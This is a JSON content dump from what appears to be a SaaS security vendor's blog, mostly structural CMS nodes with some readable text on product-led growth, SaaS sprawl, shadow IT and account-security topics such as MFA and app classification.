"marks":297922,"data":297923},[],{},{"nodeType":178,"data":297925,"content":297926},{},[297927],{"nodeType":173,"value":282362,"marks":297928,"data":297929},[],{},{"nodeType":250,"data":297931,"content":297932},{},[297933,297942],{"nodeType":254,"data":297934,"content":297935},{},[297936],{"nodeType":178,"data":297937,"content":297938},{},[297939],{"nodeType":173,"value":282375,"marks":297940,"data":297941},[],{},{"nodeType":254,"data":297943,"content":297944},{},[297945],{"nodeType":178,"data":297946,"content":297947},{},[297948],{"nodeType":173,"value":282385,"marks":297949,"data":297950},[],{},{"nodeType":235,"data":297952,"content":297953},{},[297954],{"nodeType":173,"value":282392,"marks":297955,"data":297956},[],{},{"nodeType":178,"data":297958,"content":297959},{},[297960],{"nodeType":173,"value":282399,"marks":297961,"data":297962},[],{},{"nodeType":178,"data":297964,"content":297965},{},[297966],{"nodeType":173,"value":282406,"marks":297967,"data":297968},[],{},{"nodeType":178,"data":297970,"content":297971},{},[297972,297975,297979],{"nodeType":173,"value":282413,"marks":297973,"data":297974},[],{},{"nodeType":173,"value":236043,"marks":297976,"data":297978},[297977],{"type":370},{},{"nodeType":173,"value":282421,"marks":297980,"data":297981},[],{},{"nodeType":235,"data":297983,"content":297984},{},[297985],{"nodeType":173,"value":282428,"marks":297986,"data":297987},[],{},{"nodeType":178,"data":297989,"content":297990},{},[297991],{"nodeType":173,"value":282435,"marks":297992,"data":297993},[],{},{"nodeType":178,"data":297995,"content":297996},{},[297997],{"nodeType":173,"value":282442,"marks":297998,"data":297999},[],{},{"nodeType":250,"data":298001,"content":298002},{},[298003,298012,298021,298030,298039,298048],{"nodeType":254,"data":298004,"content":298005},{},[298006],{"nodeType":178,"data":298007,"content":298008},{},[298009],{"nodeType":173,"value":273418,"marks":298010,"data":298011},[],{},{"nodeType":254,"data":298013,"content":298014},{},[298015],{"nodeType":178,"data":298016,"content":298017},{},[298018],{"nodeType":173,"value":282464,"marks":298019,"data":298020},[],{},{"nodeType":254,"data":298022,"content":298023},{},[298024],{"nodeType":178,"data":298025,"content":298026},{},[298027],{"nodeType":173,"value":273438,"marks":298028,"data":298029},[],{},{"nodeType":254,"data":298031,"content":298032},{},[298033],{"nodeType":178,"data":298034,"content":298035},{},[298036],{"nodeType":173,"value":282483,"marks":298037,"data":298038},[],{},{"nodeType":254,"data":298040,"content":298041},{},[298042],{"nodeType":178,"data":298043,"content":298044},{},[298045],{"nodeType":173,"value":273458,"marks":298046,"data":298047},[],{},{"nodeType":254,"data":298049,"content":298050},{},[298051],{"nodeType":178,"data":298052,"content":298053},{},[298054],{"nodeType":173,"value":282502,"marks":298055,"data":298056},[],{},{"nodeType":312,"data":298058,"content":298061},{"target":298059},{"sys":298060},{"id":282509,"type":317,"linkType":318},[],{"nodeType":178,"data":298063,"content":298064},{},[298065],{"nodeType":173,"value":282515,"marks":298066,"data":298067},[],{},{"nodeType":235,"data":298069,"content":298070},{},[298071],{"nodeType":173,"value":282522,"marks":298072,"data":298073},[],{},{"nodeType":178,"data":298075,"content":298076},{},[298077],{"nodeType":173,"value":282529,"marks":298078,"data":298079},[],{},{"nodeType":312,"data":298081,"content":298084},{"target":298082},{"sys":298083},{"id":282536,"type":317,"linkType":318},[],{"nodeType":178,"data":298086,"content":298087},{},[298088],{"nodeType":173,"value":37,"marks":298089,"data":298090},[],{},{"items":298092},[298093,298095],{"sys":298094,"name":274157},{"id":274156},{"sys":298096,"name":26133},{"id":26132},{"items":298098},[298099],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":298100},{"url":282559},{"items":298102},[298103],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":298104},{"url":273636},{"json":298106,"links":298851},{"nodeType":165,"data":298107,"content":298108},{},[298109,298115,298121,298126,298154,298160,298166,298182,298188,298194,298200,298216,298221,298227,298238,298244,298250,298256,298261,298282,298288,298294,298300,298306,298312,298318,298334,298341,298354,298360,298365,298383,298408,298421,298443,298449,298455,298461,298467,298473,298479,298485,298532,298538,298566,298602,298671,298677,298683,298689,298695,298701,298707,298713,298719,298724,298730,298736,298754,298760,298766,298772,298777,298783,298789,298795,298801,298822,298828,298833],{"nodeType":178,"data":298110,"content":298111},{},[298112],{"nodeType":173,"value":283440,"marks":298113,"data":298114},[],{},{"nodeType":178,"data":298116,"content":298117},{},[298118],{"nodeType":173,"value":283447,"marks":298119,"data":298120},[],{},{"nodeType":312,"data":298122,"content":298125},{"target":298123},{"sys":298124},{"id":280733,"type":317,"linkType":318},[],{"nodeType":178,"data":298127,"content":298128},{},[298129,298132,298140,298143,298151],{"nodeType":173,"value":283459,"marks":298130,"data":298131},[],{},{"nodeType":1698,"data":298133,"content":298136},{"target":298134},{"sys":298135},{"id":283466,"type":317,"linkType":318},[298137],{"nodeType":173,"value":283469,"marks":298138,"data":298139},[],{},{"nodeType":173,"value":283473,"marks":298141,"data":298142},[],{},{"nodeType":1698,"data":298144,"content":298147},{"target":298145},{"sys":298146},{"id":282056,"type":317,"linkType":318},[298148],{"nodeType":173,"value":283482,"marks":298149,"data":298150},[],{},{"nodeType":173,"value":283486,"marks":298152,"data":298153},[],{},{"nodeType":169,"data":298155,"content":298156},{},[298157],{"nodeType":173,"value":283493,"marks":298158,"data":298159},[],{},{"nodeType":178,"data":298161,"content":298162},{},[298163],{"nodeType":173,"value":283500,"marks":298164,"data":298165},[],{},{"nodeType":178,"data":298167,"content":298168},{},[298169,298172,298179],{"nodeType":173,"value":283507,"marks":298170,"data":298171},[],{},{"nodeType":186,"data":298173,"content":298174},{"uri":280989},[298175],{"nodeType":173,"value":283514,"marks":298176,"data":298178},[298177],{"type":194},{},{"nodeType":173,"value":283519,"marks":298180,"data":298181},[],{},{"nodeType":235,"data":298183,"content":298184},{},[298185],{"nodeType":173,"value":283526,"marks":298186,"data":298187},[],{},{"nodeType":178,"data":298189,"content":298190},{},[298191],{"nodeType":173,"value":283533,"marks":298192,"data":298193},[],{},{"nodeType":178,"data":298195,"content":298196},{},[298197],{"nodeType":173,"value":283540,"marks":298198,"data":298199},[],{},{"nodeType":178,"data":298201,"content":298202},{},[298203,298206,298213],{"nodeType":173,"value":283547,"marks":298204,"data":298205},[],{},{"nodeType":186,"data":298207,"content":298208},{"uri":280989},[298209],{"nodeType":173,"value":283554,"marks":298210,"data":298212},[298211],{"type":194},{},{"nodeType":173,"value":283559,"marks":298214,"data":298215},[],{},{"nodeType":312,"data":298217,"content":298220},{"target":298218},{"sys":298219},{"id":281011,"type":317,"linkType":318},[],{"nodeType":178,"data":298222,"content":298223},{},[298224],{"nodeType":173,"value":283571,"marks":298225,"data":298226},[],{},{"nodeType":178,"data":298228,"content":298229},{},[298230,298235],{"nodeType":173,"value":283578,"marks":298231,"data":298234},[298232,298233],{"type":1646},{"type":370},{},{"nodeType":173,"value":283584,"marks":298236,"data":298237},[],{},{"nodeType":178,"data":298239,"content":298240},{},[298241],{"nodeType":173,"value":283591,"marks":298242,"data":298243},[],{},{"nodeType":169,"data":298245,"content":298246},{},[298247],{"nodeType":173,"value":283598,"marks":298248,"data":298249},[],{},{"nodeType":178,"data":298251,"content":298252},{},[298253],{"nodeType":173,"value":283605,"marks":298254,"data":298255},[],{},{"nodeType":312,"data":298257,"content":298260},{"target":298258},{"sys":298259},{"id":283612,"type":317,"linkType":318},[],{"nodeType":246189,"data":298262,"content":298263},{},[298264,298273],{"nodeType":254,"data":298265,"content":298266},{},[298267],{"nodeType":178,"data":298268,"content":298269},{},[298270],{"nodeType":173,"value":283624,"marks":298271,"data":298272},[],{},{"nodeType":254,"data":298274,"content":298275},{},[298276],{"nodeType":178,"data":298277,"content":298278},{},[298279],{"nodeType":173,"value":283634,"marks":298280,"data":298281},[],{},{"nodeType":235,"data":298283,"content":298284},{},[298285],{"nodeType":173,"value":283641,"marks":298286,"data":298287},[],{},{"nodeType":178,"data":298289,"content":298290},{},[298291],{"nodeType":173,"value":283648,"marks":298292,"data":298293},[],{},{"nodeType":178,"data":298295,"content":298296},{},[298297],{"nodeType":173,"value":283655,"marks":298298,"data":298299},[],{},{"nodeType":178,"data":298301,"content":298302},{},[298303],{"nodeType":173,"value":283662,"marks":298304,"data":298305},[],{},{"nodeType":235,"data":298307,"content":298308},{},[298309],{"nodeType":173,"value":283669,"marks":298310,"data":298311},[],{},{"nodeType":178,"data":298313,"content":298314},{},[298315],{"nodeType":173,"value":283676,"marks":298316,"data":298317},[],{},{"nodeType":246189,"data":298319,"content":298320},{},[298321],{"nodeType":254,"data":298322,"content":298323},{},[298324],{"nodeType":178,"data":298325,"content":298326},{},[298327,298331],{"nodeType":173,"value":283689,"marks":298328,"data":298330},[298329],{"type":370},{},{"nodeType":173,"value":283694,"marks":298332,"data":298333},[],{},{"nodeType":178,"data":298335,"content":298336},{},[298337],{"nodeType":173,"value":283701,"marks":298338,"data":298340},[298339],{"type":370},{},{"nodeType":178,"data":298342,"content":298343},{},[298344,298347,298351],{"nodeType":173,"value":283709,"marks":298345,"data":298346},[],{},{"nodeType":173,"value":283713,"marks":298348,"data":298350},[298349],{"type":1646},{},{"nodeType":173,"value":283718,"marks":298352,"data":298353},[],{},{"nodeType":178,"data":298355,"content":298356},{},[298357],{"nodeType":173,"value":283725,"marks":298358,"data":298359},[],{},{"nodeType":312,"data":298361,"content":298364},{"target":298362},{"sys":298363},{"id":283732,"type":317,"linkType":318},[],{"nodeType":178,"data":298366,"content":298367},{},[298368,298371,298380],{"nodeType":173,"value":283738,"marks":298369,"data":298370},[],{},{"nodeType":1698,"data":298372,"content":298375},{"target":298373},{"sys":298374},{"id":283745,"type":317,"linkType":318},[298376],{"nodeType":173,"value":28052,"marks":298377,"data":298379},[298378],{"type":194},{},{"nodeType":173,"value":283752,"marks":298381,"data":298382},[],{},{"nodeType":178,"data":298384,"content":298385},{},[298386,298389,298393,298396,298405],{"nodeType":173,"value":144009,"marks":298387,"data":298388},[],{},{"nodeType":173,"value":283762,"marks":298390,"data":298392},[298391],{"type":370},{},{"nodeType":173,"value":283767,"marks":298394,"data":298395},[],{},{"nodeType":1698,"data":298397,"content":298400},{"target":298398},{"sys":298399},{"id":273995,"type":317,"linkType":318},[298401],{"nodeType":173,"value":28052,"marks":298402,"data":298404},[298403],{"type":194},{},{"nodeType":173,"value":1477,"marks":298406,"data":298407},[],{},{"nodeType":178,"data":298409,"content":298410},{},[298411,298414,298418],{"nodeType":173,"value":283786,"marks":298412,"data":298413},[],{},{"nodeType":173,"value":283790,"marks":298415,"data":298417},[298416],{"type":370},{},{"nodeType":173,"value":283795,"marks":298419,"data":298420},[],{},{"nodeType":178,"data":298422,"content":298423},{},[298424,298427,298436,298440],{"nodeType":173,"value":283802,"marks":298425,"data":298426},[],{},{"nodeType":1698,"data":298428,"content":298431},{"target":298429},{"sys":298430},{"id":283809,"type":317,"linkType":318},[298432],{"nodeType":173,"value":283812,"marks":298433,"data":298435},[298434],{"type":194},{},{"nodeType":173,"value":3107,"marks":298437,"data":298439},[298438],{"type":370},{},{"nodeType":173,"value":283821,"marks":298441,"data":298442},[],{},{"nodeType":169,"data":298444,"content":298445},{},[298446],{"nodeType":173,"value":283828,"marks":298447,"data":298448},[],{},{"nodeType":178,"data":298450,"content":298451},{},[298452],{"nodeType":173,"value":283835,"marks":298453,"data":298454},[],{},{"nodeType":178,"data":298456,"content":298457},{},[298458],{"nodeType":173,"value":283842,"marks":298459,"data":298460},[],{},{"nodeType":178,"data":298462,"content":298463},{},[298464],{"nodeType":173,"value":283849,"marks":298465,"data":298466},[],{},{"nodeType":178,"data":298468,"content":298469},{},[298470],{"nodeType":173,"value":283856,"marks":298471,"data":298472},[],{},{"nodeType":169,"data":298474,"content":298475},{},[298476],{"nodeType":173,"value":283863,"marks":298477,"data":298478},[],{},{"nodeType":178,"data":298480,"content":298481},{},[298482],{"nodeType":173,"value":283870,"marks":298483,"data":298484},[],{},{"nodeType":250,"data":298486,"content":298487},{},[298488,298510],{"nodeType":254,"data":298489,"content":298490},{},[298491,298498],{"nodeType":178,"data":298492,"content":298493},{},[298494],{"nodeType":173,"value":283883,"marks":298495,"data":298497},[298496],{"type":370},{},{"nodeType":250,"data":298499,"content":298500},{},[298501],{"nodeType":254,"data":298502,"content":298503},{},[298504],{"nodeType":178,"data":298505,"content":298506},{},[298507],{"nodeType":173,"value":283897,"marks":298508,"data":298509},[],{},{"nodeType":254,"data":298511,"content":298512},{},[298513,298520],{"nodeType":178,"data":298514,"content":298515},{},[298516],{"nodeType":173,"value":283907,"marks":298517,"data":298519},[298518],{"type":370},{},{"nodeType":250,"data":298521,"content":298522},{},[298523],{"nodeType":254,"data":298524,"content":298525},{},[298526],{"nodeType":178,"data":298527,"content":298528},{},[298529],{"nodeType":173,"value":283921,"marks":298530,"data":298531},[],{},{"nodeType":178,"data":298533,"content":298534},{},[298535],{"nodeType":173,"value":283928,"marks":298536,"data":298537},[],{},{"nodeType":250,"data":298539,"content":298540},{},[298541],{"nodeType":254,"data":298542,"content":298543},{},[298544,298554],{"nodeType":178,"data":298545,"content":298546},{},[298547,298551],{"nodeType":173,"value":283941,"marks":298548,"data":298550},[298549],{"type":370},{},{"nodeType":173,"value":197,"marks":298552,"data":298553},[],{},{"nodeType":250,"data":298555,"content":298556},{},[298557],{"nodeType":254,"data":298558,"content":298559},{},[298560],{"nodeType":178,"data":298561,"content":298562},{},[298563],{"nodeType":173,"value":283958,"marks":298564,"data":298565},[],{},{"nodeType":178,"data":298567,"content":298568},{},[298569,298572,298579,298582,298589,298592,298599],{"nodeType":173,"value":283965,"marks":298570,"data":298571},[],{},{"nodeType":186,"data":298573,"content":298574},{"uri":281153},[298575],{"nodeType":173,"value":281156,"marks":298576,"data":298578},[298577],{"type":194},{},{"nodeType":173,"value":2936,"marks":298580,"data":298581},[],{},{"nodeType":186,"data":298583,"content":298584},{"uri":281165},[298585],{"nodeType":173,"value":211167,"marks":298586,"data":298588},[298587],{"type":194},{},{"nodeType":173,"value":2936,"marks":298590,"data":298591},[],{},{"nodeType":186,"data":298593,"content":298594},{"uri":281176},[298595],{"nodeType":173,"value":281179,"marks":298596,"data":298598},[298597],{"type":194},{},{"nodeType":173,"value":281184,"marks":298600,"data":298601},[],{},{"nodeType":250,"data":298603,"content":298604},{},[298605,298627,298649],{"nodeType":254,"data":298606,"content":298607},{},[298608,298615],{"nodeType":178,"data":298609,"content":298610},{},[298611],{"nodeType":173,"value":284008,"marks":298612,"data":298614},[298613],{"type":370},{},{"nodeType":250,"data":298616,"content":298617},{},[298618],{"nodeType":254,"data":298619,"content":298620},{},[298621],{"nodeType":178,"data":298622,"content":298623},{},[298624],{"nodeType":173,"value":284022,"marks":298625,"data":298626},[],{},{"nodeType":254,"data":298628,"content":298629},{},[298630,298637],{"nodeType":178,"data":298631,"content":298632},{},[298633],{"nodeType":173,"value":284032,"marks":298634,"data":298636},[298635],{"type":370},{},{"nodeType":250,"data":298638,"content":298639},{},[298640],{"nodeType":254,"data":298641,"content":298642},{},[298643],{"nodeType":178,"data":298644,"content":298645},{},[298646],{"nodeType":173,"value":284046,"marks":298647,"data":298648},[],{},{"nodeType":254,"data":298650,"content":298651},{},[298652,298659],{"nodeType":178,"data":298653,"content":298654},{},[298655],{"nodeType":173,"value":284056,"marks":298656,"data":298658},[298657],{"type":370},{},{"nodeType":250,"data":298660,"content":298661},{},[298662],{"nodeType":254,"data":298663,"content":298664},{},[298665],{"nodeType":178,"data":298666,"content":298667},{},[298668],{"nodeType":173,"value":284070,"marks":298669,"data":298670},[],{},{"nodeType":178,"data":298672,"content":298673},{},[298674],{"nodeType":173,"value":284077,"marks":298675,"data":298676},[],{},{"nodeType":169,"data":298678,"content":298679},{},[298680],{"nodeType":173,"value":284084,"marks":298681,"data":298682},[],{},{"nodeType":178,"data":298684,"content":298685},{},[298686],{"nodeType":173,"value":284091,"marks":298687,"data":298688},[],{},{"nodeType":235,"data":298690,"content":298691},{},[298692],{"nodeType":173,"value":284098,"marks":298693,"data":298694},[],{},{"nodeType":178,"data":298696,"content":298697},{},[298698],{"nodeType":173,"value":284105,"marks":298699,"data":298700},[],{},{"nodeType":178,"data":298702,"content":298703},{},[298704],{"nodeType":173,"value":284112,"marks":298705,"data":298706},[],{},{"nodeType":178,"data":298708,"content":298709},{},[298710],{"nodeType":173,"value":284119,"marks":298711,"data":298712},[],{},{"nodeType":178,"data":298714,"content":298715},{},[298716],{"nodeType":173,"value":284126,"marks":298717,"data":298718},[],{},{"nodeType":312,"data":298720,"content":298723},{"target":298721},{"sys":298722},{"id":284133,"type":317,"linkType":318},[],{"nodeType":178,"data":298725,"content":298726},{},[298727],{"nodeType":173,"value":284139,"marks":298728,"data":298729},[],{},{"nodeType":178,"data":298731,"content":298732},{},[298733],{"nodeType":173,"value":284146,"marks":298734,"data":298735},[],{},{"nodeType":178,"data":298737,"content":298738},{},[298739,298742,298751],{"nodeType":173,"value":284153,"marks":298740,"data":298741},[],{},{"nodeType":1698,"data":298743,"content":298746},{"target":298744},{"sys":298745},{"id":281802,"type":317,"linkType":318},[298747],{"nodeType":173,"value":28052,"marks":298748,"data":298750},[298749],{"type":194},{},{"nodeType":173,"value":284166,"marks":298752,"data":298753},[],{},{"nodeType":169,"data":298755,"content":298756},{},[298757],{"nodeType":173,"value":284173,"marks":298758,"data":298759},[],{},{"nodeType":178,"data":298761,"content":298762},{},[298763],{"nodeType":173,"value":284180,"marks":298764,"data":298765},[],{},{"nodeType":178,"data":298767,"content":298768},{},[298769],{"nodeType":173,"value":284187,"marks":298770,"data":298771},[],{},{"nodeType":312,"data":298773,"content":298776},{"target":298774},{"sys":298775},{"id":284194,"type":317,"linkType":318},[],{"nodeType":178,"data":298778,"content":298779},{},[298780],{"nodeType":173,"value":284200,"marks":298781,"data":298782},[],{},{"nodeType":169,"data":298784,"content":298785},{},[298786],{"nodeType":173,"value":284207,"marks":298787,"data":298788},[],{},{"nodeType":178,"data":298790,"content":298791},{},[298792],{"nodeType":173,"value":284214,"marks":298793,"data":298794},[],{},{"nodeType":178,"data":298796,"content":298797},{},[298798],{"nodeType":173,"value":284221,"marks":298799,"data":298800},[],{},{"nodeType":250,"data":298802,"content":298803},{},[298804,298813],{"nodeType":254,"data":298805,"content":298806},{},[298807],{"nodeType":178,"data":298808,"content":298809},{},[298810],{"nodeType":173,"value":284234,"marks":298811,"data":298812},[],{},{"nodeType":254,"data":298814,"content":298815},{},[298816],{"nodeType":178,"data":298817,"content":298818},{},[298819],{"nodeType":173,"value":284244,"marks":298820,"data":298821},[],{},{"nodeType":178,"data":298823,"content":298824},{},[298825],{"nodeType":173,"value":284251,"marks":298826,"data":298827},[],{},{"nodeType":312,"data":298829,"content":298832},{"target":298830},{"sys":298831},{"id":284258,"type":317,"linkType":318},[],{"nodeType":178,"data":298834,"content":298835},{},[298836,298839,298848],{"nodeType":173,"value":284264,"marks":298837,"data":298838},[],{},{"nodeType":1698,"data":298840,"content":298843},{"target":298841},{"sys":298842},{"id":284271,"type":317,"linkType":318},[298844],{"nodeType":173,"value":284274,"marks":298845,"data":298847},[298846],{"type":194},{},{"nodeType":173,"value":1477,"marks":298849,"data":298850},[],{},{"entries":298852},{"inline":298853,"hyperlink":298854,"block":298876},[],[298855,298857,298861,298863,298865,298869,298871],{"sys":298856,"__typename":1528,"title":297416,"slug":297419},{"id":283466},{"sys":298858,"__typename":1528,"title":298859,"slug":298860},{"id":282056},"How to roll-your-own SaaS discovery","rolling-your-own-saas-discovery",{"sys":298862,"__typename":1528,"title":284927,"slug":284928},{"id":283745},{"sys":298864,"__typename":1528,"title":284931,"slug":284932},{"id":273995},{"sys":298866,"__typename":1528,"title":298867,"slug":298868},{"id":283809},"Multi-Factor Authentication is the top security control for most small and medium-sized businesses","multi-factor-authentication-is-the-top-security-control-for-most-small-and",{"sys":298870,"__typename":1528,"title":282544,"slug":282547},{"id":281802},{"sys":298872,"__typename":6655,"title":298873,"slug":298874,"articleId":298875},{"id":284271},"Guide to reviewing and classifying SaaS apps","guide-to-reviewing-and-classifying-saas-apps",10094,[298877,298884,298891,298897,298905,298911,298917],{"sys":298878,"__typename":5345,"title":298879,"caption":298879,"layoutMode":112585,"file":298880},{"id":280733},"SaaS sprawl",{"url":298881,"width":298882,"height":298883},"https://images.ctfassets.net/y1cdw1ablpvd/1KIj9P7eQ7UfOWgnUmTWUU/5f9d7369dd1ce148227db632aa1fabc7/image1.png",1731,658,{"sys":298885,"__typename":5345,"title":298886,"caption":298887,"layoutMode":112585,"file":298888},{"id":281011},"Shared responsibility model NCSC","Source: https://www.ncsc.gov.uk/collection/cloud/understanding-cloud-services/cloud-security-shared-responsibility-model",{"url":298889,"width":298890,"height":296715},"https://images.ctfassets.net/y1cdw1ablpvd/2QR4exoDHiiI32zLx7MBOL/d169ba9438f1782aba60c5c35413706d/image7.png",1662,{"sys":298892,"__typename":5345,"title":298893,"caption":118,"layoutMode":112585,"file":298894},{"id":283612},"Customer responsibility for SaaS apps PLG",{"url":298895,"width":66767,"height":298896},"https://images.ctfassets.net/y1cdw1ablpvd/6jaP9nk2U89Y1TidafgXLB/9c3af2cd634ea0621b3e2ac05739582d/image7.png",1214,{"sys":298898,"__typename":5345,"title":298899,"caption":298900,"layoutMode":118,"file":298901},{"id":283732},"SSO wall of shame","SSO.tax Wall of Shame",{"url":298902,"width":298903,"height":298904},"https://images.ctfassets.net/y1cdw1ablpvd/3V6zIEftBcNhvLnRHCZEb0/320db8a02da82df16a77371f8636174f/Screenshot_2023-07-12_at_12.59.37_PM.png",1916,1544,{"sys":298906,"__typename":5345,"title":298907,"caption":298908,"layoutMode":112585,"file":298909},{"id":284133},"Risk assessment timeline PLG","When security can make the most impact on assessing employee-adopted SaaS apps",{"url":298910,"width":103010,"height":107744},"https://images.ctfassets.net/y1cdw1ablpvd/5Vxv5h3OpO3DXpsil5GBUa/d1ca5df575cb5e9cfc612b8b757411ff/image15.png",{"sys":298912,"__typename":5345,"title":298913,"caption":118,"layoutMode":118,"file":298914},{"id":284194},"MFA Enabled",{"url":298915,"width":173178,"height":298916},"https://images.ctfassets.net/y1cdw1ablpvd/19qsMqEzIfT7c10xHlpXuS/c8372c9218ad6c55fac3901c0712786f/Image_block_5__3_.png",1163,{"sys":298918,"__typename":5345,"title":298919,"caption":118,"layoutMode":118,"file":298920},{"id":284258},"App classification gif - release notes - July 2023",{"url":298921,"width":273005,"height":298922},"https://images.ctfassets.net/y1cdw1ablpvd/2luen73d2HKKnInShkTQHk/0410498d5b5a7bd7541426a2f46f817f/app_classification_demo_new.gif",509,"content:blog:focus-on-account-security-to-reduce-saas-risks.json","blog/focus-on-account-security-to-reduce-saas-risks.json","blog/focus-on-account-security-to-reduce-saas-risks",{"_path":298927,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":298928,"ogImage":118,"summary":298931,"title":298942,"subtitle":118,"metaTitle":298943,"synopsis":298944,"hashTags":118,"publishedDate":298945,"slug":298946,"tagsCollection":298947,"relatedBlogPostsCollection":298953,"authorsCollection":300077,"content":300081,"_id":300808,"_type":5439,"_source":5440,"_file":300809,"_stem":300810,"_extension":5439},"/blog/what-is-saas-security",{"id":298929,"publishedAt":298930},"5lCSAF777tY9gHUL363UwZ","2025-01-15T14:22:40.566Z",{"json":298932},{"data":298933,"content":298934,"nodeType":165},{},[298935],{"data":298936,"content":298937,"nodeType":178},{},[298938],{"data":298939,"marks":298940,"value":298941,"nodeType":173},{},[],"SaaS Security is focused on securing sensitive data that’s stored in or integrated with the SaaS applications the company and its employees use.","SaaS Security: what is it & how to manage the risk","SaaS security — what is it and how to manage the risk","We'll quickly define SaaS security and help you better understand how to manage the risk SaaS applications introduce to your business","2023-08-03T00:00:00.000Z","what-is-saas-security",{"items":298948},[298949,298951],{"sys":298950,"name":26133},{"id":26132},{"sys":298952,"name":26137},{"id":26136},{"items":298954},[298955,299537],{"__typename":1528,"sys":298956,"content":298958,"title":299523,"synopsis":299524,"hashTags":118,"publishedDate":299525,"slug":299526,"tagsCollection":299527,"authorsCollection":299533},{"id":298957},"RColcmPkti04JQrda9WOp",{"json":298959},{"nodeType":165,"data":298960,"content":298961},{},[298962,298969,298976,298983,299000,299007,299012,299019,299026,299033,299040,299058,299065,299070,299077,299084,299107,299114,299121,299128,299135,299140,299147,299154,299163,299171,299178,299185,299192,299199,299206,299218,299225,299232,299239,299264,299297,299313,299324,299331,299338,299341,299348,299355,299362,299369,299376,299383,299390,299397,299404,299411,299418,299425,299432,299439,299446,299461,299480,299487,299494,299517],{"nodeType":178,"data":298963,"content":298964},{},[298965],{"nodeType":173,"value":298966,"marks":298967,"data":298968},"The way we’ve adopted software in our businesses has shifted dramatically over the years due to the rise of the product-led growth (PLG) movement. ",[],{},{"nodeType":169,"data":298970,"content":298971},{},[298972],{"nodeType":173,"value":298973,"marks":298974,"data":298975},"What is PLG and how does it lead SaaS sprawl?",[],{},{"nodeType":178,"data":298977,"content":298978},{},[298979],{"nodeType":173,"value":298980,"marks":298981,"data":298982},"In PLG, SaaS providers offer free trials and free versions to entice employees to sign up and immediately start using and testing their SaaS applications. SaaS vendors know they can close deals quicker if they can prove the value of their tool with their users - your employees - and “become sticky” with those users. ",[],{},{"nodeType":178,"data":298984,"content":298985},{},[298986,298990,298996],{"nodeType":173,"value":298987,"marks":298988,"data":298989},"If vendors can make their cloud apps useful enough for employees to rely on them, ",[],{},{"nodeType":173,"value":298991,"marks":298992,"data":298995},"it’s much harder for IT and security teams to swoop in and force a move to a more secure or similar SaaS application",[298993,298994],{"type":1646},{"type":370},{},{"nodeType":173,"value":298997,"marks":298998,"data":298999}," that another team in the company is already using. ",[],{},{"nodeType":178,"data":299001,"content":299002},{},[299003],{"nodeType":173,"value":299004,"marks":299005,"data":299006},"This isn’t malicious, mind you - it’s just that vendors know that SaaS security audits and due diligence can extend their sales cycles and complicate their deals. Their quickest win is to get in with your employee and turn them into their champion within your company. Here’s a quick visual for how software onboarding typically flows in this PLG-ruled world:",[],{},{"nodeType":312,"data":299008,"content":299011},{"target":299009},{"sys":299010},{"id":280624,"type":317,"linkType":318},[],{"nodeType":178,"data":299013,"content":299014},{},[299015],{"nodeType":173,"value":299016,"marks":299017,"data":299018},"Because of this shift to adoption or free trials as the first step of a “software onboarding process,” Security and IT are left with huge visibility gaps, with shadow SaaS and shadow IT growing exponentially with each employee sign up. Those shadow apps are what we’re talking about when we discuss SaaS sprawl and the risks these unmonitored accounts introduce.",[],{},{"nodeType":169,"data":299020,"content":299021},{},[299022],{"nodeType":173,"value":299023,"marks":299024,"data":299025},"The impact on SaaS security",[],{},{"nodeType":178,"data":299027,"content":299028},{},[299029],{"nodeType":173,"value":299030,"marks":299031,"data":299032},"This Saas provider shift toward pushing employees to sign up for SaaS apps without your oversight has already been happening and it’ll continue to grow in the years to come. That’s because PLG works! It’s helping SaaS vendors grow their businesses exponentially and more and more SaaS providers are going to start following suit.",[],{},{"nodeType":169,"data":299034,"content":299035},{},[299036],{"nodeType":173,"value":299037,"marks":299038,"data":299039},"How big of a problem is this, really?",[],{},{"nodeType":178,"data":299041,"content":299042},{},[299043,299047,299054],{"nodeType":173,"value":299044,"marks":299045,"data":299046},"Back in 2015, Forrester ",[],{},{"nodeType":186,"data":299048,"content":299049},{"uri":280563},[299050],{"nodeType":173,"value":280566,"marks":299051,"data":299053},[299052],{"type":194},{},{"nodeType":173,"value":299055,"marks":299056,"data":299057}," that 75% of B2B buyers prefer a no-sales-rep buying process. Product-led growth (PLG) is now the norm for SaaS companies, with around 60% of SaaS companies using this model now.  ",[],{},{"nodeType":178,"data":299059,"content":299060},{},[299061],{"nodeType":173,"value":299062,"marks":299063,"data":299064},"Here are just a few examples of common business SaaS applications sold via the PLG model, which you’ll definitely recognize. One thing you’ll quickly notice is that most of these apps are built for sales, marketing, and customer support:",[],{},{"nodeType":312,"data":299066,"content":299069},{"target":299067},{"sys":299068},{"id":280578,"type":317,"linkType":318},[],{"nodeType":169,"data":299071,"content":299072},{},[299073],{"nodeType":173,"value":299074,"marks":299075,"data":299076},"SaaS sprawl: A massive increase in the number of SaaS applications businesses use ",[],{},{"nodeType":178,"data":299078,"content":299079},{},[299080],{"nodeType":173,"value":299081,"marks":299082,"data":299083},"Adding to the shadow SaaS and SaaS sprawl storm, the sheer number of apps in use has increased dramatically over the years, and will continue to do so. There are a couple reasons for this: ",[],{},{"nodeType":246189,"data":299085,"content":299086},{},[299087,299097],{"nodeType":254,"data":299088,"content":299089},{},[299090],{"nodeType":178,"data":299091,"content":299092},{},[299093],{"nodeType":173,"value":299094,"marks":299095,"data":299096},"The big old monolithic on-prem software is being replaced not by a single SaaS app, but an ecosystem of specialized apps. ",[],{},{"nodeType":254,"data":299098,"content":299099},{},[299100],{"nodeType":178,"data":299101,"content":299102},{},[299103],{"nodeType":173,"value":299104,"marks":299105,"data":299106},"Since apps are virtually zero-maintenance these days, the operating cost of running multiple apps is almost the same as running one giant on-prem or SaaS platform. This further multiplies the number of apps and vendors used in your business.",[],{},{"nodeType":169,"data":299108,"content":299109},{},[299110],{"nodeType":173,"value":299111,"marks":299112,"data":299113},"Security SaaS applications don’t use PLG ",[],{},{"nodeType":178,"data":299115,"content":299116},{},[299117],{"nodeType":173,"value":299118,"marks":299119,"data":299120},"IT & security folks are usually ahead of the curve when it comes to technology shifts, but in this case many might have missed the scale or speed of the change. ",[],{},{"nodeType":178,"data":299122,"content":299123},{},[299124],{"nodeType":173,"value":299125,"marks":299126,"data":299127},"That’s because IT and security tools are among the least product-led of any sector. Most of our industry’s tools require heavy integrations, complicated setup, agent deployments, and so on. ",[],{},{"nodeType":178,"data":299129,"content":299130},{},[299131],{"nodeType":173,"value":299132,"marks":299133,"data":299134},"Note the difference between these common SaaS platforms for security and the ones for the rest of the company 